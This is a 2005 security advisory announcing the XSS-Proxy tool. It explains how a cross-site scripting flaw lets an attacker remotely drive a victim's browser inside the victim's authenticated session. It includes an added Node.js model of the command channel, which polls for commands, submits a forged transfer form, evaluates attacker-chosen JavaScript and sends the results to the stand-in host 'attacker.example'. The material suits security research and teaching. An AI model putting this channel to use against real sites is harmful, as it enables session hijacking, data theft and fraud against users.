Network Security Exploits-HackingTools

[TOOL] XSS-Proxy - Remotely Controlling XSS Attacks

Subject: [TOOL] XSS-Proxy - Remotely Controlling XSS Attacks
Date: 13 Feb 2005 19:07:57 +0200
The following security advisory is sent to the securiteam mailing list, and can 
be found at the SecuriTeam web site: http://www.securiteam.com



  XSS-Proxy - Remotely Controlling XSS Attacks
------------------------------------------------------------------------


SUMMARY



DETAILS

Anton Rager presented on this topic this past weekend at Shmoocon, and also 
wanted to brief the list on his persistent remote-control XSS attack 
methods and the demonstration tool he has developed.

Anton has combined common XSS exploitation techniques with Javascript 
Remoting and Session-Riding to create an attack tool that uses an XSS 
vulnerable site (or sites), and a victim that loads the XSS vector, to 
create a remotely controlled, interactive, two-way command/control channel 
from the attacker to the victim. The PoC demonstration tool is called 
XSS-Proxy; it is a lightweight, Perl based attacker tool that provides the 
command/control channel to the victim browser by translating attacker 
requests into victim Javascript and collecting/displaying the victim's 
results to the attacker.

This tool provides a persistent attacker command/control channel to the 
XSS'd victim and lets the attacker issue additional commands to the 
victim, with the victim forwarding readable document contents/results back 
to the attacker. In effect, it allows the attacker to drive the victim 
browser over the vulnerable site and perform most actions the victim 
could (such as reading pages and submitting forms). The victim browser 
continues to loop and look for additional commands from the XSS-Proxy 
controller indefinitely, and can be controlled as long as the original 
XSS'd site window stays open - Anton calls these idling victims 
"Browser-Zombies".

This is no longer just cookie theft: the attacker has the victim load 
arbitrary documents from the target XSS'd server, submit forms (POST or 
GET) to the XSS'd server and set/evaluate Javascript vars/functions within 
the victim browser. This is useful for exploiting XSS vulnerable 
sites/users where cookies are not the primary mechanism for 
authentication, since it lets an attacker leverage trust relationships the 
victim already has with target sites via cached authentication, client 
side certificate auth, IP access controls and perhaps even victims/targets 
behind firewalls. Because the commands are executed by the victim's own 
browser inside the victim's existing session, marking session cookies 
HttpOnly does not defend against this class of attack. It is also 
possible to leverage this platform/attack for Cross-Site-Request-Forgery 
(CSRF) / Session-Riding attacks on non XSS vulnerable servers, multi-XSS 
site redirection (walking a list of sites to see whether this user has 
privileges on any of them), masqueraded attacks on specific XSS 
vulnerable target servers (think Nikto through someone else's browser), 
MITM attacks on interactive victim windows and possibly even leveraging 
CSRF traffic to look for other XSS flawed servers.
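As an added illustration (this is not XSS-Proxy's own code), the following 
Node.js model shows the two halves of the channel described above: a 
controller that queues commands per session and reassembles results, and 
the victim-side loop that polls, executes a command against the XSS'd 
origin and reports back. Because the injected script can only reach the 
attacker's host cross-origin by requesting a URL (a script or image src), 
every result must be URL-encoded and split to fit a GET request; that 
length constraint and the reassembly are the part worth seeing. The host 
name, paths, parameter names and the sample "bank" site are 
hypothetical/constructed, and the iframe and script-tag plumbing of a real 
browser is replaced by two injected functions so the logic runs offline.

```javascript
// Added example, not XSS-Proxy's own code: a minimal model of the
// command/control channel the advisory describes, written so the protocol
// logic runs offline under Node.js. Host names, paths and parameter names
// are hypothetical, and the "bank" site below is constructed sample data.
//
// Controller = attacker side (serves commands, reassembles results).
// Zombie     = the script an XSS vector would inject into the victim.
// Results travel back as GET requests (a script/img src pointing at the
// controller), so every result is URL-encoded and split to fit a URL.

const MAX_URL_LEN = 2000; // conservative GET-length budget (assumption)

class Controller {
  constructor() {
    this.queues = new Map();  // sessionId -> pending commands
    this.partial = new Map(); // "session:cmd" -> { total, chunks }
    this.results = [];        // completed { sessionId, cmdId, data }
  }
  enqueue(sessionId, cmd) {
    if (!this.queues.has(sessionId)) this.queues.set(sessionId, []);
    this.queues.get(sessionId).push(cmd);
  }
  // Served at /cmd: the next command for this zombie, or an idle marker.
  nextCommand(sessionId) {
    const q = this.queues.get(sessionId) || [];
    return q.length ? q.shift() : { id: 'none', type: 'idle' };
  }
  // Served at /result: store one chunk; true once the whole result is in.
  receive(url) {
    const p = new URL(url).searchParams;
    const key = `${p.get('s')}:${p.get('c')}`;
    if (!this.partial.has(key)) {
      this.partial.set(key, { total: Number(p.get('n')), chunks: [] });
    }
    const rec = this.partial.get(key);
    rec.chunks[Number(p.get('i'))] = p.get('d');   // chunks may arrive out of order
    if (rec.chunks.filter((c) => c !== undefined).length < rec.total) return false;
    this.results.push({ sessionId: p.get('s'), cmdId: p.get('c'), data: rec.chunks.join('') });
    this.partial.delete(key);
    return true;
  }
}

// Split one result into GET URLs that each stay within MAX_URL_LEN.
function chunkResult(base, sessionId, cmdId, data) {
  const prefix = `${base}?s=${encodeURIComponent(sessionId)}&c=${encodeURIComponent(cmdId)}`;
  const budget = MAX_URL_LEN - prefix.length - '&i=99999&n=99999&d='.length;
  const pieces = [];
  let cur = '';
  for (const ch of data) {               // iterate by code point
    const enc = encodeURIComponent(ch);  // '+' becomes %2B, so searchParams decodes it back
    if (cur.length + enc.length > budget) { pieces.push(cur); cur = ''; }
    cur += enc;
  }
  if (cur.length || pieces.length === 0) pieces.push(cur);
  return pieces.map((d, i) => `${prefix}&i=${i}&n=${pieces.length}&d=${d}`);
}

// Victim side. loadSameOrigin(method, path, body) stands in for loading a
// page or submitting a form in a hidden iframe on the XSS'd origin and
// reading its DOM; hit(url) stands in for pointing a script/img src at the
// controller. Both are injected so the loop runs without a browser.
class Zombie {
  constructor(sessionId, controllerBase, loadSameOrigin, hit) {
    this.sessionId = sessionId;
    this.controllerBase = controllerBase;
    this.loadSameOrigin = loadSameOrigin;
    this.hit = hit;
  }
  execute(cmd) {
    switch (cmd.type) {
      case 'get':  return this.loadSameOrigin('GET', cmd.path, null);
      case 'post': return this.loadSameOrigin('POST', cmd.path, cmd.body);
      case 'eval': return Function(`return (${cmd.expr})`)(); // attacker-chosen JS
      default:     return null;
    }
  }
  // One iteration of the polling loop; false once the controller is idle.
  step(fetchCommand) {
    const cmd = fetchCommand(this.sessionId);
    if (cmd.type === 'idle') return false;
    const out = this.execute(cmd);
    const urls = chunkResult(`${this.controllerBase}/result`, this.sessionId, cmd.id,
                             out == null ? '' : String(out));
    for (const url of urls) this.hit(url);
    return true;
  }
}

// Constructed stand-in for the XSS'd site; a real zombie reads the
// victim's authenticated pages through the browser instead.
function constructedSite(method, path, body) {
  if (method === 'GET' && path === '/account') return '<h1>Balance: 1,234.56</h1>';
  if (method === 'POST' && path === '/transfer') return `<p>Transfer queued: ${body}</p>`;
  return '<p>404</p>';
}

// Drive one session until the controller is idle; return completed results.
function runSession() {
  const ctl = new Controller();
  const sid = 'z1';
  ctl.enqueue(sid, { id: 'c1', type: 'get',  path: '/account' });
  ctl.enqueue(sid, { id: 'c2', type: 'post', path: '/transfer', body: 'to=attacker&amt=100' });
  ctl.enqueue(sid, { id: 'c3', type: 'eval', expr: '"x".repeat(5000)' }); // forces chunking
  const z = new Zombie(sid, 'http://attacker.example', constructedSite, (u) => ctl.receive(u));
  while (z.step((s) => ctl.nextCommand(s))) { /* keep polling */ }
  return ctl.results;
}
```

Calling runSession() yields three completed results: the account page, 
the transfer confirmation, and the 5000-character eval result, which 
travels as three separate GET hits and is reassembled on the controller 
side. Nothing here touches a cookie; the channel rides entirely on the 
victim's existing session, which is the point the advisory makes.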

Anton has a draft white paper that provides more detail on the basic XSS 
based Javascript Remoting attack and outlines some approaches/details on 
methods for extending the attack even further at:
http://xss-proxy.sourceforge.net/Advanced_XSS_Control.txt
The XSS-Proxy demonstration tool is available at the project section of 
the same site (http://sourceforge.net/projects/xss-proxy). Anton's 
Shmoocon slides and links to additional primer information on XSS attacks 
can be found at http://xss-proxy.sourceforge.net

Anton doesn't regard himself as a WWW developer and therefore believes he 
may have missed some other implications and/or more elegant ways of 
implementing this sort of attack, but the basic attack does work and the 
XSS-Proxy tool allows it to be explored further. Anton had a lot of 
positive feedback at Shmoocon, but he is very interested in feedback from 
other researchers as well as related ideas for extending persistent, 
intelligent and controlled XSS/Session-Riding/CSRF attacks.


ADDITIONAL INFORMATION

The information has been provided by Anton Rager <arager@avaya.com>.
The original article can be found at:
http://xss-proxy.sourceforge.net/Advanced_XSS_Control.txt
To keep updated with the tool visit the project's homepage at:
http://sourceforge.net/projects/xss-proxy




DISCLAIMER: 
The information in this bulletin is provided "AS IS" without warranty of any 
kind. 
In no event shall we be liable for any damages whatsoever including direct, 
indirect, incidental, consequential, loss of business profits or special 
damages. 



